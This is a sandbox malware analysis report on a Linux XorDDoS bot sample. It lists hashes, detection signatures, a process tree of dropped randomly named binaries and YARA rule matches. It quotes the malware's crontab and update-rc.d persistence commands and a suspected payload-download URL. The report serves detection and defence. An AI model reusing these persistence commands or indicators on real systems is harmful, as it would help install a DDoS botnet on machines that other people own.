Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
0Xorddos.o

Overview

General Information

Sample Name:0Xorddos.o
Analysis ID:588994
MD5:da818861f56900f552eb04c5e7d8c59d
SHA1:4a414ccf923001621457e4beaf2ec0e7b165f2ac
SHA256:d920dec25946a86aeaffd5a53ce8c3f05c9a7bac44d5c71481f497de430cb67e
Tags:elflinuxXorDDOS
Infos:

Detection

XorDDoS
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus detection for dropped file
Yara detected XorDDoS Bot
Sample tries to persist itself using System V runlevels
Machine Learning detection for dropped file
Sample tries to persist itself using cron
Drops files in suspicious directories
Sample deletes itself
Machine Learning detection for sample
Writes ELF files to disk
Yara signature match
Drops files with innocent-looking names
PID-file does not contain an ASCII number
Writes shell script files to disk
Reads system information from the proc file system
Uses the "uname" system call to query kernel version information (possible evasion)
Executes the "systemctl" command used for controlling the systemd system and service manager
Detected non-DNS traffic on DNS port
Executes commands using a shell command-line interpreter
Reads CPU information from /proc indicative of miner or evasive malware
Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox Version:34.0.0 Boulder Opal
Analysis ID:588994
Start date:14.03.2022
Start time:21:20:39
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 23s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:0Xorddos.o
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Detection:MAL
Classification:mal100.troj.evad.linO@0/19@16/0

Warnings

  • VT rate limit hit for: http://www1.gggatat456.com/dd.rar/lib/libudev.soB/var/run/gcc.pidB/var/run/9/tmp/6/bin/6/usr/bin/9ys

Runtime Messages

Command:/tmp/0Xorddos.o
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:

Standard Error:

Process Tree

  • system is lnxubuntu20
  • 0Xorddos.o (PID: 5221, Parent: 5119, MD5: da818861f56900f552eb04c5e7d8c59d) Arguments: /tmp/0Xorddos.o
    • 0Xorddos.o New Fork (PID: 5222, Parent: 5221)
      • 0Xorddos.o New Fork (PID: 5225, Parent: 5222)
        • update-rc.d (PID: 5226, Parent: 1860, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: update-rc.d 0Xorddos.o defaults
          • systemctl (PID: 5232, Parent: 5226, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
      • sh (PID: 5227, Parent: 5222, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
        • sh New Fork (PID: 5228, Parent: 5227)
        • sed (PID: 5228, Parent: 5227, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
      • 0Xorddos.o New Fork (PID: 5254, Parent: 5222)
        • uqxezzsakx (PID: 5255, Parent: 5254, MD5: 67365f9c1f2b194742925772fc9232ab) Arguments: /usr/bin/uqxezzsakx pwd 5222
      • 0Xorddos.o New Fork (PID: 5259, Parent: 5222)
        • uqxezzsakx (PID: 5260, Parent: 5259, MD5: 67365f9c1f2b194742925772fc9232ab) Arguments: /usr/bin/uqxezzsakx "echo \"find\"" 5222
      • 0Xorddos.o New Fork (PID: 5261, Parent: 5222)
        • uqxezzsakx (PID: 5262, Parent: 5261, MD5: 67365f9c1f2b194742925772fc9232ab) Arguments: /usr/bin/uqxezzsakx "netstat -antop" 5222
      • 0Xorddos.o New Fork (PID: 5264, Parent: 5222)
        • uqxezzsakx (PID: 5265, Parent: 5264, MD5: 67365f9c1f2b194742925772fc9232ab) Arguments: /usr/bin/uqxezzsakx sh 5222
      • 0Xorddos.o New Fork (PID: 5267, Parent: 5222)
        • uqxezzsakx (PID: 5268, Parent: 5267, MD5: 67365f9c1f2b194742925772fc9232ab) Arguments: /usr/bin/uqxezzsakx "sleep 1" 5222
      • 0Xorddos.o New Fork (PID: 5273, Parent: 5222)
        • cukrqcagnz (PID: 5274, Parent: 5273, MD5: c8d0992125712b7648ce9d7c261decea) Arguments: /usr/bin/cukrqcagnz who 5222
      • 0Xorddos.o New Fork (PID: 5276, Parent: 5222)
        • cukrqcagnz (PID: 5277, Parent: 5276, MD5: c8d0992125712b7648ce9d7c261decea) Arguments: /usr/bin/cukrqcagnz "ifconfig eth0" 5222
      • 0Xorddos.o New Fork (PID: 5279, Parent: 5222)
        • cukrqcagnz (PID: 5280, Parent: 5279, MD5: c8d0992125712b7648ce9d7c261decea) Arguments: /usr/bin/cukrqcagnz "netstat -antop" 5222
      • 0Xorddos.o New Fork (PID: 5281, Parent: 5222)
        • cukrqcagnz (PID: 5282, Parent: 5281, MD5: c8d0992125712b7648ce9d7c261decea) Arguments: /usr/bin/cukrqcagnz pwd 5222
      • 0Xorddos.o New Fork (PID: 5284, Parent: 5222)
        • cukrqcagnz (PID: 5285, Parent: 5284, MD5: c8d0992125712b7648ce9d7c261decea) Arguments: /usr/bin/cukrqcagnz "sleep 1" 5222
      • 0Xorddos.o New Fork (PID: 5291, Parent: 5222)
        • ysrkbnorkl (PID: 5292, Parent: 5291, MD5: 4d2e235cead4f0439bc635f5a18f4bf4) Arguments: /usr/bin/ysrkbnorkl gnome-terminal 5222
      • 0Xorddos.o New Fork (PID: 5294, Parent: 5222)
        • ysrkbnorkl (PID: 5295, Parent: 5294, MD5: 4d2e235cead4f0439bc635f5a18f4bf4) Arguments: /usr/bin/ysrkbnorkl "ps -ef" 5222
      • 0Xorddos.o New Fork (PID: 5296, Parent: 5222)
        • ysrkbnorkl (PID: 5297, Parent: 5296, MD5: 4d2e235cead4f0439bc635f5a18f4bf4) Arguments: /usr/bin/ysrkbnorkl "echo \"find\"" 5222
      • 0Xorddos.o New Fork (PID: 5299, Parent: 5222)
        • ysrkbnorkl (PID: 5300, Parent: 5299, MD5: 4d2e235cead4f0439bc635f5a18f4bf4) Arguments: /usr/bin/ysrkbnorkl "ifconfig eth0" 5222
      • 0Xorddos.o New Fork (PID: 5302, Parent: 5222)
        • ysrkbnorkl (PID: 5303, Parent: 5302, MD5: 4d2e235cead4f0439bc635f5a18f4bf4) Arguments: /usr/bin/ysrkbnorkl ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5308, Parent: 5222)
        • zareoppgxh (PID: 5309, Parent: 5308, MD5: 8bd739bbc978f1311f3459fae05bbefd) Arguments: /usr/bin/zareoppgxh bash 5222
      • 0Xorddos.o New Fork (PID: 5311, Parent: 5222)
        • zareoppgxh (PID: 5312, Parent: 5311, MD5: 8bd739bbc978f1311f3459fae05bbefd) Arguments: /usr/bin/zareoppgxh "ps -ef" 5222
      • 0Xorddos.o New Fork (PID: 5313, Parent: 5222)
        • zareoppgxh (PID: 5314, Parent: 5313, MD5: 8bd739bbc978f1311f3459fae05bbefd) Arguments: /usr/bin/zareoppgxh id 5222
      • 0Xorddos.o New Fork (PID: 5316, Parent: 5222)
        • zareoppgxh (PID: 5317, Parent: 5316, MD5: 8bd739bbc978f1311f3459fae05bbefd) Arguments: /usr/bin/zareoppgxh id 5222
      • 0Xorddos.o New Fork (PID: 5319, Parent: 5222)
        • zareoppgxh (PID: 5320, Parent: 5319, MD5: 8bd739bbc978f1311f3459fae05bbefd) Arguments: /usr/bin/zareoppgxh "netstat -an" 5222
      • 0Xorddos.o New Fork (PID: 5326, Parent: 5222)
        • cvltgpdmgk (PID: 5327, Parent: 5326, MD5: 868c28a2f8b2ca95f48a4e00a2889e23) Arguments: /usr/bin/cvltgpdmgk gnome-terminal 5222
      • 0Xorddos.o New Fork (PID: 5329, Parent: 5222)
        • cvltgpdmgk (PID: 5330, Parent: 5329, MD5: 868c28a2f8b2ca95f48a4e00a2889e23) Arguments: /usr/bin/cvltgpdmgk "ps -ef" 5222
      • 0Xorddos.o New Fork (PID: 5332, Parent: 5222)
        • cvltgpdmgk (PID: 5333, Parent: 5332, MD5: 868c28a2f8b2ca95f48a4e00a2889e23) Arguments: /usr/bin/cvltgpdmgk ls 5222
      • 0Xorddos.o New Fork (PID: 5334, Parent: 5222)
        • cvltgpdmgk (PID: 5335, Parent: 5334, MD5: 868c28a2f8b2ca95f48a4e00a2889e23) Arguments: /usr/bin/cvltgpdmgk top 5222
      • 0Xorddos.o New Fork (PID: 5337, Parent: 5222)
        • cvltgpdmgk (PID: 5338, Parent: 5337, MD5: 868c28a2f8b2ca95f48a4e00a2889e23) Arguments: /usr/bin/cvltgpdmgk "netstat -antop" 5222
      • 0Xorddos.o New Fork (PID: 5345, Parent: 5222)
        • tngemhgnzk (PID: 5346, Parent: 5345, MD5: 67d9c73d144874e910413a9ff5f8be8d) Arguments: /usr/bin/tngemhgnzk ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5348, Parent: 5222)
        • tngemhgnzk (PID: 5349, Parent: 5348, MD5: 67d9c73d144874e910413a9ff5f8be8d) Arguments: /usr/bin/tngemhgnzk "route -n" 5222
      • 0Xorddos.o New Fork (PID: 5350, Parent: 5222)
        • tngemhgnzk (PID: 5351, Parent: 5350, MD5: 67d9c73d144874e910413a9ff5f8be8d) Arguments: /usr/bin/tngemhgnzk "route -n" 5222
      • 0Xorddos.o New Fork (PID: 5353, Parent: 5222)
        • tngemhgnzk (PID: 5354, Parent: 5353, MD5: 67d9c73d144874e910413a9ff5f8be8d) Arguments: /usr/bin/tngemhgnzk "cat resolv.conf" 5222
      • 0Xorddos.o New Fork (PID: 5356, Parent: 5222)
        • tngemhgnzk (PID: 5357, Parent: 5356, MD5: 67d9c73d144874e910413a9ff5f8be8d) Arguments: /usr/bin/tngemhgnzk "grep \"A\"" 5222
      • 0Xorddos.o New Fork (PID: 5363, Parent: 5222)
        • njezqqgxiu (PID: 5364, Parent: 5363, MD5: 1e085bdf101bbe4f3c0dd1fe168620df) Arguments: /usr/bin/njezqqgxiu sh 5222
      • 0Xorddos.o New Fork (PID: 5366, Parent: 5222)
        • njezqqgxiu (PID: 5367, Parent: 5366, MD5: 1e085bdf101bbe4f3c0dd1fe168620df) Arguments: /usr/bin/njezqqgxiu "route -n" 5222
      • 0Xorddos.o New Fork (PID: 5369, Parent: 5222)
        • njezqqgxiu (PID: 5370, Parent: 5369, MD5: 1e085bdf101bbe4f3c0dd1fe168620df) Arguments: /usr/bin/njezqqgxiu "ls -la" 5222
      • 0Xorddos.o New Fork (PID: 5371, Parent: 5222)
        • njezqqgxiu (PID: 5372, Parent: 5371, MD5: 1e085bdf101bbe4f3c0dd1fe168620df) Arguments: /usr/bin/njezqqgxiu "ifconfig eth0" 5222
      • 0Xorddos.o New Fork (PID: 5374, Parent: 5222)
        • njezqqgxiu (PID: 5375, Parent: 5374, MD5: 1e085bdf101bbe4f3c0dd1fe168620df) Arguments: /usr/bin/njezqqgxiu "netstat -an" 5222
      • 0Xorddos.o New Fork (PID: 5384, Parent: 5222)
        • wzulpfbuxk (PID: 5385, Parent: 5384, MD5: 3544260d47adf075442cc29318bed673) Arguments: /usr/bin/wzulpfbuxk id 5222
      • 0Xorddos.o New Fork (PID: 5387, Parent: 5222)
        • wzulpfbuxk (PID: 5388, Parent: 5387, MD5: 3544260d47adf075442cc29318bed673) Arguments: /usr/bin/wzulpfbuxk ls 5222
      • 0Xorddos.o New Fork (PID: 5389, Parent: 5222)
        • wzulpfbuxk (PID: 5390, Parent: 5389, MD5: 3544260d47adf075442cc29318bed673) Arguments: /usr/bin/wzulpfbuxk "route -n" 5222
      • 0Xorddos.o New Fork (PID: 5392, Parent: 5222)
        • wzulpfbuxk (PID: 5393, Parent: 5392, MD5: 3544260d47adf075442cc29318bed673) Arguments: /usr/bin/wzulpfbuxk id 5222
      • 0Xorddos.o New Fork (PID: 5395, Parent: 5222)
        • wzulpfbuxk (PID: 5396, Parent: 5395, MD5: 3544260d47adf075442cc29318bed673) Arguments: /usr/bin/wzulpfbuxk gnome-terminal 5222
      • 0Xorddos.o New Fork (PID: 5401, Parent: 5222)
        • aoyymackpm (PID: 5402, Parent: 5401, MD5: 4b35d88168505669df2e8ba08379e487) Arguments: /usr/bin/aoyymackpm sh 5222
      • 0Xorddos.o New Fork (PID: 5404, Parent: 5222)
        • aoyymackpm (PID: 5405, Parent: 5404, MD5: 4b35d88168505669df2e8ba08379e487) Arguments: /usr/bin/aoyymackpm "netstat -antop" 5222
      • 0Xorddos.o New Fork (PID: 5407, Parent: 5222)
        • aoyymackpm (PID: 5408, Parent: 5407, MD5: 4b35d88168505669df2e8ba08379e487) Arguments: /usr/bin/aoyymackpm "echo \"find\"" 5222
      • 0Xorddos.o New Fork (PID: 5410, Parent: 5222)
        • aoyymackpm (PID: 5411, Parent: 5410, MD5: 4b35d88168505669df2e8ba08379e487) Arguments: /usr/bin/aoyymackpm gnome-terminal 5222
      • 0Xorddos.o New Fork (PID: 5412, Parent: 5222)
        • aoyymackpm (PID: 5413, Parent: 5412, MD5: 4b35d88168505669df2e8ba08379e487) Arguments: /usr/bin/aoyymackpm "cat resolv.conf" 5222
      • 0Xorddos.o New Fork (PID: 5418, Parent: 5222)
        • gbsknxiwip (PID: 5419, Parent: 5418, MD5: 332829866022c2218579e44d63c2dae3) Arguments: /usr/bin/gbsknxiwip gnome-terminal 5222
      • 0Xorddos.o New Fork (PID: 5421, Parent: 5222)
        • gbsknxiwip (PID: 5422, Parent: 5421, MD5: 332829866022c2218579e44d63c2dae3) Arguments: /usr/bin/gbsknxiwip "sleep 1" 5222
      • 0Xorddos.o New Fork (PID: 5423, Parent: 5222)
        • gbsknxiwip (PID: 5424, Parent: 5423, MD5: 332829866022c2218579e44d63c2dae3) Arguments: /usr/bin/gbsknxiwip "netstat -antop" 5222
      • 0Xorddos.o New Fork (PID: 5426, Parent: 5222)
        • gbsknxiwip (PID: 5427, Parent: 5426, MD5: 332829866022c2218579e44d63c2dae3) Arguments: /usr/bin/gbsknxiwip who 5222
      • 0Xorddos.o New Fork (PID: 5428, Parent: 5222)
        • gbsknxiwip (PID: 5429, Parent: 5428, MD5: 332829866022c2218579e44d63c2dae3) Arguments: /usr/bin/gbsknxiwip "cat resolv.conf" 5222
      • 0Xorddos.o New Fork (PID: 5435, Parent: 5222)
        • gpcmhoiszu (PID: 5436, Parent: 5435, MD5: 2398b188e4ccdfa7852549d00ece9eb7) Arguments: /usr/bin/gpcmhoiszu su 5222
      • 0Xorddos.o New Fork (PID: 5438, Parent: 5222)
        • gpcmhoiszu (PID: 5439, Parent: 5438, MD5: 2398b188e4ccdfa7852549d00ece9eb7) Arguments: /usr/bin/gpcmhoiszu bash 5222
      • 0Xorddos.o New Fork (PID: 5441, Parent: 5222)
        • gpcmhoiszu (PID: 5442, Parent: 5441, MD5: 2398b188e4ccdfa7852549d00ece9eb7) Arguments: /usr/bin/gpcmhoiszu ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5444, Parent: 5222)
        • gpcmhoiszu (PID: 5445, Parent: 5444, MD5: 2398b188e4ccdfa7852549d00ece9eb7) Arguments: /usr/bin/gpcmhoiszu su 5222
      • 0Xorddos.o New Fork (PID: 5446, Parent: 5222)
        • gpcmhoiszu (PID: 5447, Parent: 5446, MD5: 2398b188e4ccdfa7852549d00ece9eb7) Arguments: /usr/bin/gpcmhoiszu whoami 5222
      • 0Xorddos.o New Fork (PID: 5455, Parent: 5222)
        • qizbpqmtbi (PID: 5456, Parent: 5455, MD5: a1b79114b59e6fc4cb28e756f2425224) Arguments: /usr/bin/qizbpqmtbi uptime 5222
      • 0Xorddos.o New Fork (PID: 5458, Parent: 5222)
        • qizbpqmtbi (PID: 5459, Parent: 5458, MD5: a1b79114b59e6fc4cb28e756f2425224) Arguments: /usr/bin/qizbpqmtbi "cat resolv.conf" 5222
      • 0Xorddos.o New Fork (PID: 5460, Parent: 5222)
        • qizbpqmtbi (PID: 5461, Parent: 5460, MD5: a1b79114b59e6fc4cb28e756f2425224) Arguments: /usr/bin/qizbpqmtbi ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5463, Parent: 5222)
        • qizbpqmtbi (PID: 5464, Parent: 5463, MD5: a1b79114b59e6fc4cb28e756f2425224) Arguments: /usr/bin/qizbpqmtbi "ls -la" 5222
      • 0Xorddos.o New Fork (PID: 5466, Parent: 5222)
        • qizbpqmtbi (PID: 5467, Parent: 5466, MD5: a1b79114b59e6fc4cb28e756f2425224) Arguments: /usr/bin/qizbpqmtbi "cat resolv.conf" 5222
      • 0Xorddos.o New Fork (PID: 5472, Parent: 5222)
        • cvvhpkxdyk (PID: 5473, Parent: 5472, MD5: de6e16b421b0aeff8b86522f8c8a2ef7) Arguments: /usr/bin/cvvhpkxdyk su 5222
      • 0Xorddos.o New Fork (PID: 5475, Parent: 5222)
        • cvvhpkxdyk (PID: 5476, Parent: 5475, MD5: de6e16b421b0aeff8b86522f8c8a2ef7) Arguments: /usr/bin/cvvhpkxdyk whoami 5222
      • 0Xorddos.o New Fork (PID: 5478, Parent: 5222)
        • cvvhpkxdyk (PID: 5479, Parent: 5478, MD5: de6e16b421b0aeff8b86522f8c8a2ef7) Arguments: /usr/bin/cvvhpkxdyk bash 5222
      • 0Xorddos.o New Fork (PID: 5480, Parent: 5222)
        • cvvhpkxdyk (PID: 5481, Parent: 5480, MD5: de6e16b421b0aeff8b86522f8c8a2ef7) Arguments: /usr/bin/cvvhpkxdyk id 5222
      • 0Xorddos.o New Fork (PID: 5482, Parent: 5222)
        • cvvhpkxdyk (PID: 5484, Parent: 5482, MD5: de6e16b421b0aeff8b86522f8c8a2ef7) Arguments: /usr/bin/cvvhpkxdyk ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5489, Parent: 5222)
        • oscovqjuil (PID: 5490, Parent: 5489, MD5: 9c0655b6b1c4ddae6f4f1c2598424c40) Arguments: /usr/bin/oscovqjuil "netstat -an" 5222
      • 0Xorddos.o New Fork (PID: 5492, Parent: 5222)
        • oscovqjuil (PID: 5493, Parent: 5492, MD5: 9c0655b6b1c4ddae6f4f1c2598424c40) Arguments: /usr/bin/oscovqjuil ls 5222
      • 0Xorddos.o New Fork (PID: 5495, Parent: 5222)
        • oscovqjuil (PID: 5496, Parent: 5495, MD5: 9c0655b6b1c4ddae6f4f1c2598424c40) Arguments: /usr/bin/oscovqjuil whoami 5222
      • 0Xorddos.o New Fork (PID: 5498, Parent: 5222)
        • oscovqjuil (PID: 5499, Parent: 5498, MD5: 9c0655b6b1c4ddae6f4f1c2598424c40) Arguments: /usr/bin/oscovqjuil gnome-terminal 5222
      • 0Xorddos.o New Fork (PID: 5502, Parent: 5222)
        • oscovqjuil (PID: 5504, Parent: 5502, MD5: 9c0655b6b1c4ddae6f4f1c2598424c40) Arguments: /usr/bin/oscovqjuil "echo \"find\"" 5222
      • 0Xorddos.o New Fork (PID: 5509, Parent: 5222)
        • cxictzyxcu (PID: 5510, Parent: 5509, MD5: 2930abf3b376ed3414bd8a59a8f8e1bf) Arguments: /usr/bin/cxictzyxcu "echo \"find\"" 5222
      • 0Xorddos.o New Fork (PID: 5512, Parent: 5222)
        • cxictzyxcu (PID: 5513, Parent: 5512, MD5: 2930abf3b376ed3414bd8a59a8f8e1bf) Arguments: /usr/bin/cxictzyxcu ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5515, Parent: 5222)
        • cxictzyxcu (PID: 5516, Parent: 5515, MD5: 2930abf3b376ed3414bd8a59a8f8e1bf) Arguments: /usr/bin/cxictzyxcu "netstat -an" 5222
      • 0Xorddos.o New Fork (PID: 5517, Parent: 5222)
        • cxictzyxcu (PID: 5519, Parent: 5517, MD5: 2930abf3b376ed3414bd8a59a8f8e1bf) Arguments: /usr/bin/cxictzyxcu ls 5222
      • 0Xorddos.o New Fork (PID: 5521, Parent: 5222)
        • cxictzyxcu (PID: 5522, Parent: 5521, MD5: 2930abf3b376ed3414bd8a59a8f8e1bf) Arguments: /usr/bin/cxictzyxcu bash 5222
      • 0Xorddos.o New Fork (PID: 5526, Parent: 5222)
        • qfvvwlqqkq (PID: 5527, Parent: 5526, MD5: 0e70bb0814ee7b2c7ad5cf64f29d5619) Arguments: /usr/bin/qfvvwlqqkq "ps -ef" 5222
      • 0Xorddos.o New Fork (PID: 5529, Parent: 5222)
        • qfvvwlqqkq (PID: 5530, Parent: 5529, MD5: 0e70bb0814ee7b2c7ad5cf64f29d5619) Arguments: /usr/bin/qfvvwlqqkq "grep \"A\"" 5222
      • 0Xorddos.o New Fork (PID: 5532, Parent: 5222)
        • qfvvwlqqkq (PID: 5533, Parent: 5532, MD5: 0e70bb0814ee7b2c7ad5cf64f29d5619) Arguments: /usr/bin/qfvvwlqqkq sh 5222
      • 0Xorddos.o New Fork (PID: 5534, Parent: 5222)
        • qfvvwlqqkq (PID: 5536, Parent: 5534, MD5: 0e70bb0814ee7b2c7ad5cf64f29d5619) Arguments: /usr/bin/qfvvwlqqkq su 5222
      • 0Xorddos.o New Fork (PID: 5537, Parent: 5222)
        • qfvvwlqqkq (PID: 5538, Parent: 5537, MD5: 0e70bb0814ee7b2c7ad5cf64f29d5619) Arguments: /usr/bin/qfvvwlqqkq who 5222
      • 0Xorddos.o New Fork (PID: 5546, Parent: 5222)
        • yfmoszlrcg (PID: 5547, Parent: 5546, MD5: 60863a11322160a778609c30ecc68f82) Arguments: /usr/bin/yfmoszlrcg bash 5222
      • 0Xorddos.o New Fork (PID: 5549, Parent: 5222)
        • yfmoszlrcg (PID: 5550, Parent: 5549, MD5: 60863a11322160a778609c30ecc68f82) Arguments: /usr/bin/yfmoszlrcg id 5222
      • 0Xorddos.o New Fork (PID: 5552, Parent: 5222)
        • yfmoszlrcg (PID: 5553, Parent: 5552, MD5: 60863a11322160a778609c30ecc68f82) Arguments: /usr/bin/yfmoszlrcg "netstat -an" 5222
      • 0Xorddos.o New Fork (PID: 5554, Parent: 5222)
        • yfmoszlrcg (PID: 5555, Parent: 1860, MD5: 60863a11322160a778609c30ecc68f82) Arguments: /usr/bin/yfmoszlrcg ifconfig 5222
      • 0Xorddos.o New Fork (PID: 5557, Parent: 5222)
        • yfmoszlrcg (PID: 5558, Parent: 1860, MD5: 60863a11322160a778609c30ecc68f82) Arguments: /usr/bin/yfmoszlrcg su 5222
      • 0Xorddos.o New Fork (PID: 5563, Parent: 5222)
        • ohcvvmubid (PID: 5564, Parent: 5563, MD5: c7ce206c868addcd2e0bc6024f6f630d) Arguments: /usr/bin/ohcvvmubid id 5222
      • 0Xorddos.o New Fork (PID: 5565, Parent: 5222)
        • ohcvvmubid (PID: 5566, Parent: 1860, MD5: c7ce206c868addcd2e0bc6024f6f630d) Arguments: /usr/bin/ohcvvmubid top 5222
      • 0Xorddos.o New Fork (PID: 5568, Parent: 5222)
        • ohcvvmubid (PID: 5569, Parent: 5568, MD5: c7ce206c868addcd2e0bc6024f6f630d) Arguments: /usr/bin/ohcvvmubid who 5222
      • 0Xorddos.o New Fork (PID: 5571, Parent: 5222)
        • ohcvvmubid (PID: 5572, Parent: 1860, MD5: c7ce206c868addcd2e0bc6024f6f630d) Arguments: /usr/bin/ohcvvmubid top 5222
      • 0Xorddos.o New Fork (PID: 5574, Parent: 5222)
        • ohcvvmubid (PID: 5575, Parent: 1860, MD5: c7ce206c868addcd2e0bc6024f6f630d) Arguments: /usr/bin/ohcvvmubid "ps -ef" 5222
      • 0Xorddos.o New Fork (PID: 5580, Parent: 5222)
        • kswkpwzxrd (PID: 5581, Parent: 1860, MD5: 0fbca893d09e52c16eab105ba5aa9665) Arguments: /usr/bin/kswkpwzxrd "route -n" 5222
      • 0Xorddos.o New Fork (PID: 5582, Parent: 5222)
        • kswkpwzxrd (PID: 5583, Parent: 1860, MD5: 0fbca893d09e52c16eab105ba5aa9665) Arguments: /usr/bin/kswkpwzxrd "cd /etc" 5222
      • 0Xorddos.o New Fork (PID: 5584, Parent: 5222)
        • kswkpwzxrd (PID: 5586, Parent: 1860, MD5: 0fbca893d09e52c16eab105ba5aa9665) Arguments: /usr/bin/kswkpwzxrd "cd /etc" 5222
      • 0Xorddos.o New Fork (PID: 5587, Parent: 5222)
        • kswkpwzxrd (PID: 5588, Parent: 1860, MD5: 0fbca893d09e52c16eab105ba5aa9665) Arguments: /usr/bin/kswkpwzxrd "ls -la" 5222
      • 0Xorddos.o New Fork (PID: 5590, Parent: 5222)
        • kswkpwzxrd (PID: 5591, Parent: 1860, MD5: 0fbca893d09e52c16eab105ba5aa9665) Arguments: /usr/bin/kswkpwzxrd gnome-terminal 5222
  • systemd New Fork (PID: 5234, Parent: 5233)
  • snapd-env-generator (PID: 5234, Parent: 5233, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
0Xorddos.oJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
    0Xorddos.oMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
    • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
    • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
    • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
    • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
    0Xorddos.oXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
    • 0x6b0c4:$st0: BB2FA36AAA9541F0
    • 0x6b0d4:$st0: BB2FA36AAA9541F0
    • 0x6b0e4:$st0: BB2FA36AAA9541F0
    • 0x6b0f4:$st0: BB2FA36AAA9541F0
    • 0x6b104:$st0: BB2FA36AAA9541F0
    • 0x6b114:$st0: BB2FA36AAA9541F0
    • 0x6b124:$st0: BB2FA36AAA9541F0
    • 0x6b134:$st0: BB2FA36AAA9541F0
    • 0x6b144:$st0: BB2FA36AAA9541F0
    • 0x6b154:$st0: BB2FA36AAA9541F0
    • 0x6b164:$st0: BB2FA36AAA9541F0
    • 0x6b174:$st0: BB2FA36AAA9541F0
    • 0x6b184:$st0: BB2FA36AAA9541F0
    • 0x6b194:$st0: BB2FA36AAA9541F0
    • 0x6b1a4:$st0: BB2FA36AAA9541F0
    • 0x6b1b4:$st0: BB2FA36AAA9541F0
    • 0x6b1c4:$st0: BB2FA36AAA9541F0
    • 0x6b1d4:$st0: BB2FA36AAA9541F0
    • 0x6b1e4:$st0: BB2FA36AAA9541F0
    • 0x6b1f4:$st0: BB2FA36AAA9541F0
    • 0x6b204:$st0: BB2FA36AAA9541F0

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /usr/bin/cvvhpkxdykJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
      /usr/bin/cvvhpkxdykMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
      • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
      • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
      • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
      • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
      /usr/bin/wzulpfbuxkJoeSecurity_XorDDoSYara detected XorDDoS BotJoe Security
        /usr/bin/wzulpfbuxkMALWARE_Linux_XORDDoSDetects XORDDoSditekSHen
        • 0x863fb:$s1: for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
        • 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6
        • 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab
        • 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
        /usr/bin/wzulpfbuxkXOR_DDosv1Rule to detect XOR DDos infectionAkamai CSIRT
        • 0x6b0c4:$st0: BB2FA36AAA9541F0
        • 0x6b0d4:$st0: BB2FA36AAA9541F0
        • 0x6b0e4:$st0: BB2FA36AAA9541F0
        • 0x6b0f4:$st0: BB2FA36AAA9541F0
        • 0x6b104:$st0: BB2FA36AAA9541F0
        • 0x6b114:$st0: BB2FA36AAA9541F0
        • 0x6b124:$st0: BB2FA36AAA9541F0
        • 0x6b134:$st0: BB2FA36AAA9541F0
        • 0x6b144:$st0: BB2FA36AAA9541F0
        • 0x6b154:$st0: BB2FA36AAA9541F0
        • 0x6b164:$st0: BB2FA36AAA9541F0
        • 0x6b174:$st0: BB2FA36AAA9541F0
        • 0x6b184:$st0: BB2FA36AAA9541F0
        • 0x6b194:$st0: BB2FA36AAA9541F0
        • 0x6b1a4:$st0: BB2FA36AAA9541F0
        • 0x6b1b4:$st0: BB2FA36AAA9541F0
        • 0x6b1c4:$st0: BB2FA36AAA9541F0
        • 0x6b1d4:$st0: BB2FA36AAA9541F0
